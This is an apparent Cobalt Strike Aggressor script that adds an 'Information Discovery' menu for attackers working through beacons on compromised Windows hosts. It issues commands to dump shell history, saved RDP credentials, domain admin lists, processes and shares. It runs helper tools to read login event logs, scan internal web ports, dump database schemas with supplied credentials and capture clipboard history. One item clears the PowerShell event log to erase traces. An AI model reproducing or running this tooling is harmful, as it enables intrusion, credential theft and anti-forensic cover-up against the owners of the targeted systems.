##############################
#                            #
#                            #
#                            #
#       XWAY.CN@panda        #
#                            #
#                            #
#                            #
##############################
menu "Information Discovery" {

				item "Get QQ Login History" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "dir \\\\.\\pipe\\\\ | findstr \"QQ_\" | findstr \"_pipe\"");
			}
		}	
				item "Get RDP Port" {
            local('$bid');
            foreach $bid ($1){
                blog($1, "Check Rdp Open Port");
                bpowershell_import($bid, script_resource("/script/RegRdpPort.ps1"));
                bpowerpick($bid,"RegRdpPort");
                bshell($bid,"wevtutil cl \"Windows PowerShell\"");
                }
            }
				item "CMD History" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "doskey /history");
			}
		}
				item "PowerShell History" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt");
			}
		}
				item "Recent Files" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "dir %APPDATA%\\Microsoft\\Windows\\Recent");
			}
		}		
				item "Check SMB Path" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic share get name,path");
			}
		}
				item "List of All Installed Programs" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic product list brief");
			}
		}
				item "Hotfix Information" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic qfe  get hotfixid");
			}
		}
				item "Tasklist" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "wmic process get caption,commandline,processid /value");
			}
		}
				item "Check Services" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net start");
			}
		}
				item "Firewall Configs" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "netsh firewall show config");
			}
		}
				item "List Domain Admin" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net group \"domain admins\" /domain");
			}
		}

				item "systeminfo" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "systeminfo");
			}
		}
				item "mstsc History" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "cmdkey /list");
			}
		}
				item "List all domains and workgroups in the network" {
			local('$bid');
			foreach $bid ($1){
				bshell($1, "net view /domain");
			}
		}
			    item "List all hosts in the domian" {
             prompt_text("domain?", "", lambda({
            bshell(@ids, "net view /DOMAIN:$1");
        }, @ids => $1));
    }
	        item "SharpEventLog" {
			$bid = $1;
			$dialog = dialog("SharpEventLog", %(EventLogType => "-4624",bid => $bid), &SharpEventLog);
			dialog_description($dialog, "Read EventLog: Get all login attempts(4624,4625). Locate system manager.");
			drow_combobox($dialog, "EventLogType", "EventLog Type:", @("-4624", "-4625"));
            dbutton_action($dialog, "RUN");
			dialog_show($dialog);
        }
sub SharpEventLog {
	bexecute_assembly($bid, script_resource("/script/SharpEventLog.exe"), $3['EventLogType']);
}
			item "SharpWebScan" {
			$bid = $1['@'];
			$dialog = dialog("SharpWebScan", %(iptype => "-IP",ip => beacon_info($bid,"internal"),port => "80,8080,8001,1433",bid => $bid), &SharpWebScan);
			dialog_description($dialog, "Scan common web ports");
			drow_text($dialog, "ip", "ip:  ");	
			drow_text($dialog, "port", "ports:  ");			
			drow_combobox($dialog, "iptype", "-ip/-cip", @("-IP", "-CIP"));
            dbutton_action($dialog, "RUN");
			dialog_show($dialog);
        }
sub SharpWebScan {
	$arg = join(' ', @($3['iptype'],$3['ip'],$3['port']));
	bexecute_assembly($bid, script_resource("/script/SharpWebScan.exe"), $arg);
}
			item "SharpCheckInfo" {
			$bid = $1;
			$dialog = dialog("SharpCheckInfo", %(Type => "-All",bid => $bid), &SharpCheckInfo);
			dialog_description($dialog, "Gather local informations, including environmental variables, recent files, recycle bin, etc..");
			drow_combobox($dialog, "Type", "Type:", @("-All", "-EnvironmentalVariables","-GetRecycle","-AllUserDirectories","-PowershellInfo","-CsharpVersion","-AvProcessEDRproduct","-Defender","-RecentFiles","-NetworkConnentions","-ApplockerEnumerating","-Drives","-LAPS"));
            dbutton_action($dialog, "RUN");
			dialog_show($dialog);
        }
sub SharpCheckInfo {
	bexecute_assembly($bid, script_resource("/script/SharpCheckInfo.exe"), $3['Type']);
}
			item "SharpSQLDump" {
			$bid = $1['@'];
			$dialog = dialog("SharpSQLDump", %(host => "",username => "",password => "",type => "mysql",bid => $bid), &SharpSQLDump);
			dialog_description($dialog, "Get database info of db, table, colunm names. Works on MySQL, MSSQL。");
			drow_text($dialog, "host", "host:  ");	
			drow_text($dialog, "username", "username:  ");	
			drow_text($dialog, "password", "password:  ");			
			drow_combobox($dialog, "type", "-mysql/-mssql", @("-mysql", "-mssql"));
            dbutton_action($dialog, "RUN");
			dialog_show($dialog);
        }
sub SharpSQLDump {
		$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type']));
		bexecute_assembly($bid, script_resource("/script/SharpSQLDump.exe"), $arg);
}	
		item "SharpClipHistory" {
			bexecute_assembly($1, script_resource("/script/SharpClipHistory.exe"), "");
		}	
			
	}
